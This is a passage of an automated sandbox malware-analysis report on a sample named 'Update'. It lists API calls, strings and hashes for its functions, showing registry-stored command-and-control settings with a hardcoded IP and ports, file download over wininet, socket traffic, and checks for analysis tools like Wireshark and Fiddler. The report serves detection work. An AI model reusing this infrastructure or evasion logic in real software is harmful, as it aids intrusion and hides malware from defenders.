                                                                                            • Associated: 00000003.00000002.3562581470.0000000000066000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_20000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 820f74a876ac7edbd6fd730b0338a772056c0ae38bb2f8772e5092a16f1475d2
                                                                                            • Instruction ID: 72f4e71403ef172630e9f4d921635a31af2f3fb1bf2705bb2136757d700a6015
                                                                                            • Opcode Fuzzy Hash: 820f74a876ac7edbd6fd730b0338a772056c0ae38bb2f8772e5092a16f1475d2
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Function 00910AE4 Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                            • Instruction ID: d120686cb65c05db9ad377b88b6e9693dca83b5791753b271493562881fbd61f
                                                                                            • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                            • Instruction Fuzzy Hash: E7318C76A0834B8FCB10DF18C480966B7E4FFC9318F1A096DE89597312D3B5F9958B91
                                                                                            Function 034EB556 Relevance: 43.9, APIs: 8, Strings: 17, Instructions: 161registrysleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 034EB586
                                                                                            • RegDeleteValueW.ADVAPI32(?,IpDate), ref: 034EB596
                                                                                            • RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 034EB5B3
                                                                                            • _memset.LIBCMT ref: 034EB5D4
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 034EB61B
                                                                                            • _memset.LIBCMT ref: 034EB63C
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 034EB72C
                                                                                            • Sleep.KERNEL32(000007D0), ref: 034EB737
                                                                                              • Part of subcall function 034EF707: std::exception::exception.LIBCMT ref: 034EF756
                                                                                              • Part of subcall function 034EF707: std::exception::exception.LIBCMT ref: 034EF770
                                                                                              • Part of subcall function 034EF707: __CxxThrowException@8.LIBCMT ref: 034EF781
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
                                                                                            • String ID: 134.122.155.39$134.122.155.39$134.122.155.39$15091$15092$15093$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                                                                                            • API String ID: 1186799303-392579377
                                                                                            • Opcode ID: 92d120c9103a46976770ecdf8ed32043e291dae8c62618ed1930227fa04b9e45
                                                                                            • Instruction ID: ae3dd442ee004b4de8c2af3a07ee1ca4f9baace36891171f3f1b9d56f909b1e5
                                                                                            • Opcode Fuzzy Hash: 92d120c9103a46976770ecdf8ed32043e291dae8c62618ed1930227fa04b9e45
                                                                                            • Instruction Fuzzy Hash: 0741F4757843007FE610E611AC8BF1E7364AF45F12F144819FA147E2D3E6E2A919CAAF
                                                                                            Function 034F4014 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F401C
                                                                                            • __mtterm.LIBCMT ref: 034F4028
                                                                                              • Part of subcall function 034F3CF1: DecodePointer.KERNEL32(0000000A,034F1084,034F106A,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F3D02
                                                                                              • Part of subcall function 034F3CF1: TlsFree.KERNEL32(00000021,034F1084,034F106A,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F3D1C
                                                                                              • Part of subcall function 034F3CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,034F1084,034F106A,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F8D48
                                                                                              • Part of subcall function 034F3CF1: _free.LIBCMT ref: 034F8D4B
                                                                                              • Part of subcall function 034F3CF1: DeleteCriticalSection.KERNEL32(00000021,?,?,034F1084,034F106A,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F8D72
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 034F403E
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 034F404B
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 034F4058
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 034F4065
                                                                                            • TlsAlloc.KERNEL32(?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F40B5
                                                                                            • TlsSetValue.KERNEL32(00000000,?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F40D0
                                                                                            • __init_pointers.LIBCMT ref: 034F40DA
                                                                                            • EncodePointer.KERNEL32(?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F40EB
                                                                                            • EncodePointer.KERNEL32(?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F40F8
                                                                                            • EncodePointer.KERNEL32(?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F4105
                                                                                            • EncodePointer.KERNEL32(?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F4112
                                                                                            • DecodePointer.KERNEL32(Function_00013E75,?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F4133
                                                                                            • __calloc_crt.LIBCMT ref: 034F4148
                                                                                            • DecodePointer.KERNEL32(00000000,?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F4162
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034F4174
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                            • API String ID: 3698121176-3819984048
                                                                                            • Opcode ID: c1fb622c4b4f03f8b941759f3d269b5f615c510b3f6765ba904c059a53b7655d
                                                                                            • Instruction ID: 6767da08e67c6e5919f01a29432acce52d54beefe914c4fc272728ee29d17cb3
                                                                                            • Opcode Fuzzy Hash: c1fb622c4b4f03f8b941759f3d269b5f615c510b3f6765ba904c059a53b7655d
                                                                                            • Instruction Fuzzy Hash: 06312E75900215AED750FF77E948D2A7EA4AB48764B19061BE9108B3FCEB31808AFE54
                                                                                            Function 034EC3A0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 170stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                                                                            • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                            • API String ID: 3970221696-33419044
                                                                                            • Opcode ID: 265defd800ead7741a3823a0362ae056bc671fbb0e63e9968ffadb8c9dfa3de9
                                                                                            • Instruction ID: f3e2e4c16adf8b6dc0100624b2dfae7955d04c023e760aecbfc09579d6b44143
                                                                                            • Opcode Fuzzy Hash: 265defd800ead7741a3823a0362ae056bc671fbb0e63e9968ffadb8c9dfa3de9
                                                                                            • Instruction Fuzzy Hash: C25111B59403186EDB20E760CC85FEF73789F54701F0445DAE709ED180EA719A45CFA9
                                                                                            Function 034E7C80 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 141libraryloaderfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryW.KERNEL32(wininet.dll), ref: 034E7CC3
                                                                                            • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 034E7CD7
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 034E7CF7
                                                                                            • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 034E7D16
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 034E7D53
                                                                                            • _memset.LIBCMT ref: 034E7D7E
                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 034E7D8C
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 034E7DDB
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E7DF9
                                                                                            • Sleep.KERNEL32(00000001), ref: 034E7E01
                                                                                            • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 034E7E0D
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 034E7E28
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                                                                            • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                            • API String ID: 1463273941-1099148085
                                                                                            • Opcode ID: 1f1e6d6f0448212871400f7f0ba857f97ba8da5a3abc6b74679503d4e00bfd2e
                                                                                            • Instruction ID: 3aebffe64f5a92a3743820bf5519500225bdd970cb59de2bacad7cb76f5e85e8
                                                                                            • Opcode Fuzzy Hash: 1f1e6d6f0448212871400f7f0ba857f97ba8da5a3abc6b74679503d4e00bfd2e
                                                                                            • Instruction Fuzzy Hash: 7541C671A4021CABDB20EB649C45FEEB7F8BF44701F14C5E9E648AA280DE715A468FD4
                                                                                            Function 034E4530 Relevance: 27.2, APIs: 18, Instructions: 247threadnetworksleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000064), ref: 034E455A
                                                                                            • timeGetTime.WINMM ref: 034E457B
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034E459B
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 034E45BD
                                                                                            • SwitchToThread.KERNEL32 ref: 034E45D7
                                                                                            • SetEvent.KERNEL32(?), ref: 034E4620
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E4644
                                                                                            • send.WS2_32(?,035049C0,00000010,00000000), ref: 034E4668
                                                                                            • SetEvent.KERNEL32(?), ref: 034E4686
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 034E4691
                                                                                            • WSACloseEvent.WS2_32(?), ref: 034E469F
                                                                                            • shutdown.WS2_32(?,00000001), ref: 034E46B3
                                                                                            • closesocket.WS2_32(?), ref: 034E46BD
                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 034E46F6
                                                                                            • SetLastError.KERNEL32(000005B4), ref: 034E470A
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034E472B
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 034E4743
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                            • String ID:
                                                                                            • API String ID: 1692523546-0
                                                                                            • Opcode ID: 44f943d1b3f7f855233b3b35038ac6ddcb497a1d2b2e094a626ad061a8101a09
                                                                                            • Instruction ID: 5516207c4863b04e81301aff9b8799b4fd9ad10d09a0328eff666d72cf269872
                                                                                            • Opcode Fuzzy Hash: 44f943d1b3f7f855233b3b35038ac6ddcb497a1d2b2e094a626ad061a8101a09
                                                                                            • Instruction Fuzzy Hash: 8F91DD34600602AFC724DF66D888BAAF7A9FF44306F04851AE5168FB64C735F896CBD4
                                                                                            Function 034EA6F0 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 254COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memset$swprintf$_malloc
                                                                                            • String ID: %s %s$onlyloadinmyself$plugmark
                                                                                            • API String ID: 1873853019-591889663
                                                                                            • Opcode ID: ca79671e527f554dcecd2d3846b857280172d9bf13b705f9033b8c8e4ea809c4
                                                                                            • Instruction ID: d1bf49152a4608664f5e864b06d087ec07e41936dc765edee783176d655102c8
                                                                                            • Opcode Fuzzy Hash: ca79671e527f554dcecd2d3846b857280172d9bf13b705f9033b8c8e4ea809c4
                                                                                            • Instruction Fuzzy Hash: 8E8104B9A40300AFE710EF14EC86F6B77A4AF45711F094169ED185F383E771E914CAAA
                                                                                            Function 00912D57 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ResetEvent.KERNEL32(?), ref: 00912D72
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 00912D7E
                                                                                            • timeGetTime.WINMM ref: 00912D84
                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 00912DB1
                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00912DDD
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 00912DE9
                                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 00912E08
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 00912E14
                                                                                            • gethostbyname.WS2_32(00000000), ref: 00912E22
                                                                                            • htons.WS2_32(?), ref: 00912E44
                                                                                            • connect.WS2_32(?,?,00000010), ref: 00912E62
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                            • String ID: 0u
                                                                                            • API String ID: 640718063-3203441087
                                                                                            • Opcode ID: 39edbacc94200cba1e2c05282cef4647c34456396228b0fcf87ba83b1cc88278
                                                                                            • Instruction ID: 2d4409480145eb5ddf4838dc74e4eba1e4cca12f9e5f4263a2ed90292e83dbe2
                                                                                            • Opcode Fuzzy Hash: 39edbacc94200cba1e2c05282cef4647c34456396228b0fcf87ba83b1cc88278
                                                                                            • Instruction Fuzzy Hash: 26614071A40308BFE720DFA4DC85FAAB7B8FF48711F104619F646AB2D0D7B1A9448B64
                                                                                            Function 034E5CC0 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 164windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 034E5CD3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: VisibleWindow
                                                                                            • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                                                            • API String ID: 1208467747-3439171801
                                                                                            • Opcode ID: 009cbe5ad9d5998b34860ab520c00e85d18da5be5d320c9ba8d493a12b99e251
                                                                                            • Instruction ID: 0ce7f565747e25b7b2d973f7188019d6cd0dbfaebcd131bd8941b8abcd2c4927
                                                                                            • Opcode Fuzzy Hash: 009cbe5ad9d5998b34860ab520c00e85d18da5be5d320c9ba8d493a12b99e251
                                                                                            • Instruction Fuzzy Hash: B9413A6AE45712AEDB61E6367C02F9F214C1E6348BB0C00AAED5CEC247F74AD21544AE
                                                                                            Function 00914507 Relevance: 22.7, APIs: 15, Instructions: 161threadnetworksleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000064), ref: 00914531
                                                                                            • timeGetTime.WINMM ref: 00914552
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00914572
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00914594
                                                                                            • SwitchToThread.KERNEL32 ref: 009145AE
                                                                                            • SetEvent.KERNEL32(?), ref: 009145F7
                                                                                            • CloseHandle.KERNEL32(?), ref: 0091461B
                                                                                            • send.WS2_32(?,10017440,00000010,00000000), ref: 0091463F
                                                                                            • SetEvent.KERNEL32(?), ref: 0091465D
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 00914668
                                                                                            • WSACloseEvent.WS2_32(?), ref: 00914676
                                                                                            • shutdown.WS2_32(?,00000001), ref: 0091468A
                                                                                            • closesocket.WS2_32(?), ref: 00914694
                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 009146CD
                                                                                            • SetLastError.KERNEL32(000005B4), ref: 009146E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Event$CloseErrorExchangeInterlockedLastThread$CompareCurrentHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                            • String ID:
                                                                                            • API String ID: 1063552937-0
                                                                                            • Opcode ID: 5c9eb4c72f87222164f91e2bd37fc10ff7097731acfcc2078ffaff40636bb074
                                                                                            • Instruction ID: 6b631afc6d431ba96dad0fd830d392ab964c42d0a41015638641d04497129dd9
                                                                                            • Opcode Fuzzy Hash: 5c9eb4c72f87222164f91e2bd37fc10ff7097731acfcc2078ffaff40636bb074
                                                                                            • Instruction Fuzzy Hash: DA51AD7170062AEBD725DF64C888BE9B7AAFF49346F148115F6058AA80C775E8E0CBD0
                                                                                            Function 034EDA30 Relevance: 21.3, APIs: 14, Instructions: 254COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,034EA8C1,?,?), ref: 034EDA43
                                                                                            • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,034EA8C1,?,?), ref: 034EDA62
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1452528299-0
                                                                                            • Opcode ID: 49324587c813d383f21871166b17717cc487c71abb6ba974a66c2903d19be832
                                                                                            • Instruction ID: 80887756b28273fe63c2a58d44a7fadb688f78d5ab1f2d40c38554cd43434fda
                                                                                            • Opcode Fuzzy Hash: 49324587c813d383f21871166b17717cc487c71abb6ba974a66c2903d19be832
                                                                                            • Instruction Fuzzy Hash: 5F81D172B003059FD720DFA9D884B6AB7E8FB4931AF04456AE90ACF740E771E545CB94
                                                                                            Function 034EC5E0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034EC63D
                                                                                            • _memset.LIBCMT ref: 034EC64C
                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 034EC66F
                                                                                              • Part of subcall function 034EC81E: RegCloseKey.ADVAPI32(80000000,034EC7FA), ref: 034EC82B
                                                                                              • Part of subcall function 034EC81E: RegCloseKey.ADVAPI32(00000000), ref: 034EC834
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close_memset$Open
                                                                                            • String ID: %08X
                                                                                            • API String ID: 4292648718-3773563069
                                                                                            • Opcode ID: 30fbc169c43dbc139b1ecf230185f6d6d90e8f2961aaeedbd050919c42f27abb
                                                                                            • Instruction ID: 5a3b60499b0a3b502c066a2658af3e771915f5a907dd2d584505b6ffab439d7a
                                                                                            • Opcode Fuzzy Hash: 30fbc169c43dbc139b1ecf230185f6d6d90e8f2961aaeedbd050919c42f27abb
                                                                                            • Instruction Fuzzy Hash: 2A517FF2A00218AFDB24EF50CC95FEAB778EB44705F40459AF705AA180D771AF44CB98
                                                                                            Function 034E36F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 034E3710
                                                                                            • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 034E3749
                                                                                            • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 034E3766
                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 034E3779
                                                                                            • WSACreateEvent.WS2_32 ref: 034E377B
                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,03511F0C), ref: 034E378D
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,03511F0C), ref: 034E3799
                                                                                            • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,03511F0C), ref: 034E37B8
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03511F0C), ref: 034E37C4
                                                                                            • gethostbyname.WS2_32(00000000), ref: 034E37D2
                                                                                            • htons.WS2_32(?), ref: 034E37F8
                                                                                            • WSAEventSelect.WS2_32(?,?,00000030), ref: 034E3816
                                                                                            • connect.WS2_32(?,?,00000010), ref: 034E382B
                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,03511F0C), ref: 034E383A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                            • String ID:
                                                                                            • API String ID: 1455939504-0
                                                                                            • Opcode ID: e663d076ffe03e43febddaf919beff0635260a46516501494fb554336664072c
                                                                                            • Instruction ID: dfbd263a24ac6c07625753aa20a7bf070611d7247d56b3e81aa63aee2f10dbbd
                                                                                            • Opcode Fuzzy Hash: e663d076ffe03e43febddaf919beff0635260a46516501494fb554336664072c
                                                                                            • Instruction Fuzzy Hash: D3417E75A00305ABEB24EFA4DC89FBFB7B8FB48715F104519F6119B2D0C671A805DB64
                                                                                            Function 034EAA10 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 190sleeptimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(?,DF800B7B), ref: 034EAA58
                                                                                            • wsprintfW.USER32 ref: 034EAA8F
                                                                                            • _memset.LIBCMT ref: 034EAAA7
                                                                                            • _memset.LIBCMT ref: 034EAABA
                                                                                              • Part of subcall function 034E8020: lstrlenW.KERNEL32(?), ref: 034E8038
                                                                                              • Part of subcall function 034E8020: _memset.LIBCMT ref: 034E8042
                                                                                              • Part of subcall function 034E8020: lstrlenW.KERNEL32(?), ref: 034E804B
                                                                                              • Part of subcall function 034E8020: lstrlenW.KERNEL32(?), ref: 034E8056
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 034EABBE
                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 034EAC6E
                                                                                            • CloseHandle.KERNEL32(?), ref: 034EACAA
                                                                                              • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
                                                                                              • Part of subcall function 034E9730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,DF800B7B,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E,00000000), ref: 034E9773
                                                                                              • Part of subcall function 034E9730: InitializeCriticalSectionAndSpinCount.KERNEL32(034EE1AE,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E9812
                                                                                              • Part of subcall function 034E9730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E9850
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
                                                                                            • String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
                                                                                            • API String ID: 1254190970-1225219777
                                                                                            • Opcode ID: b7d3fdecd5ea2782360fd9c3acf0039e04e5a766527cb328f9a1a3ecc5bea19a
